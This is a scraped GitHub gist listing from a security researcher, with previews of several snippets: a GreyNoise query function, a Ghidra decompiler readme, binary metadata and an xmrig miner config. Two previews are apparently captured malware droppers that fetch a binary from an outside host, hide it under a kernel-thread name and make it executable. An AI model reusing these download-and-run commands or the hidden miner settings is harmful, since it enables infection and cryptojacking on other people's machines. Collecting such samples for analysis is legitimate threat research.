This gist contains a list of verified Metasploit Meterpreter http(s) handlers and Powershell Empire http(s) listeners.
Servers could be malicious, or just part of a red teaming action.
Remco Verhoef nl5887
-
DutchSec
- Netherlands
- Sign in to view email
- https://dutchsec.com/
nl5887
/ gist:0a55e297aad9bf5f4882deb44ea0ef79
Created Mar 18, 2019
fish function to query greynoise for specific ip
View gist:0a55e297aad9bf5f4882deb44ea0ef79
| function greynoise | |
| if test (count $argv) -eq 0 | |
| echo "No arguments specified. Usage:\necho greynoise {ip}" | |
| return 1 | |
| end | |
| set ip $argv[1] | |
| curl -s -XPOST -d "ip=$ip" 'http://api.greynoise.io:8888/v1/query/ip'|jq '.' | |
| end |
nl5887
/ 000_readme.md
Created Mar 7, 2019
View 00_readme.md
Ghydra decompiler
This python script communicates with the Ghydra decompiler. Currently it succeeds in communicating, sending hardcoded opcodes and returning decompiled code.
Next steps:
- implement exception handling
- implement callbacks
- allow decompilation of custom payloads
- etc
View all
| ps aux |awk '$3>40.0{print $2}'|xargs kill -9 | |
| cd /tmp | |
| if [ $? -ne 0 ] | |
| then | |
| export PATH=`pwd`:$PATH | |
| else | |
| export PATH=/tmp:$PATH | |
| fi | |
| wget -q v.kernelupgr.com/d/vv -O \[bioset\] || curl -s v.kernelupgr.com/d/vv -o \[bioset\] | |
| chmod +x \[bioset\] |
View a
| #!/bin/sh | |
| # Edit | |
| WEBSERVER="209.141.50.26" | |
| # Stop editing now | |
| BINARIES="arm arm7 arm64" | |
| for Binary in $BINARIES; do |
View gist:e7b044f7d264dba7d88daed49a3c084e
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| # Copyright 2012-2017 Matt Martz | |
| # All Rights Reserved. | |
| # | |
| # Licensed under the Apache License, Version 2.0 (the "License"); you may | |
| # not use this file except in compliance with the License. You may obtain | |
| # a copy of the License at | |
| # | |
| # http://www.apache.org/licenses/LICENSE-2.0 |
nl5887
/ gist:9cb88cf2ef9849d3873b611bce3b0aaa
Created Jan 3, 2019
View gist:9cb88cf2ef9849d3873b611bce3b0aaa
| A1/knnUWULU2NiOgmM//YB9bTMpU+Zg3JfBube+UUTbHcbV0/akpEn/3VnZb7lYTDCxazq0efcDarXzQK6X1Xnk4pAYgqCOhlLjjqhSLWk6Uy+c8Fd0Q69dhMG4neFv2HbTohqdIrv+5iixaKhxP3lMJVW5TAiuRJrHiMA5z4MxgTX89Oz8jM+S5bcQhKVPfk8LrRLFk2Zlp7hj68e2Cqaa/wQC8osJPLm/Y/ejJgjQg4WpHJ+bEEZWIRmr0dhsZLYSWBn1FEMzv43KkrDAmb1gM9G63Llxj8MfZlOcZXcnDgn7e4ytoL56mkcBUOEYmG/5JJ2OQvIkcheq+77rztisgsPxSVdo+KQyVbYrCvFCHb2Eh | |
| A1/kzSIfAKdirHqv4ILCwBmTbiutpRbIQIGZJ38p5ugwNTjDYvnj73yC/sZbhoIXG/x4OwI4SgwijkqkiBELYSBf13gS5Y1pxnswZuhytjkpsBpBUCmsggE27TRtm9BD9V+BuQOIlPigmmJ6G+4dWnc4kCNkdh/4ga7Ym2AzuPDK0TgDkyds4OSkh271uGC0Q6WC0YleKGaF6oi1rMSUhI8NqzBtVTwNafUR49t0LxArB9DQuSzbGVqXBnPZpSKsfkq0Wv+vaDekCouZ6vFQ2YPXr8IxRXoxxGHgJVuANxPPb3jzHcSgo76BX2i4OLNeS1k1lZqmgUc7qz7XgNxlnTAKaSAu4kLjgZkrE8tpFU3LqFRece8D84Sy | |
| A16zzHwSVQTcEZqvZ61pmw0hpca/WzVMF2kP89s5/9I4y2J47hcQidU1h4pzyZdA0F5QtAzrEKkveIpAQEPdX3/74CBVf5qE49Dmy6Od4YQgpEoX2KXGrHUJC+HsVZUr5efGu1H1aLiZH1Y/0mxvzVRuYZDN01jLAXDhTEOfFbAarX86B5ckT/3VdO2gdNvvku/26rHdLC0SbiwyfElwCz9SMePTI+TT5hlnmh2oTwzy5+UwUUBVwJAAU2LkT2OAIOzdPpWVvSLYSKRqP7xaPI |
nl5887
/ gist:9f3413ed486b117134c59aa4daee17b8
Created Nov 29, 2018
View gist:9f3413ed486b117134c59aa4daee17b8
| MD5 (/Users/remco/Downloads/paimon.x86) = 5efce325c5aa2fa11553bf6a4bd94b74 | |
| arch x86 | |
| baddr 0x8048000 | |
| binsz 37184 | |
| bintype elf | |
| bits 32 | |
| canary false | |
| sanitiz false | |
| class ELF32 |
View config.json
| { | |
| "algo": "cryptonight", // cryptonight (default) or cryptonight-lite | |
| "av": 0, // algorithm variation, 0 auto select | |
| "background": true, // true to run the miner in the background | |
| "colors": true, // false to disable colored output | |
| "cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1 | |
| "cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest) | |
| "donate-level": 3, // donate level, mininum 1% | |
| "log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log" | |
| "max-cpu-usage": 65, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option. |
NewerOlder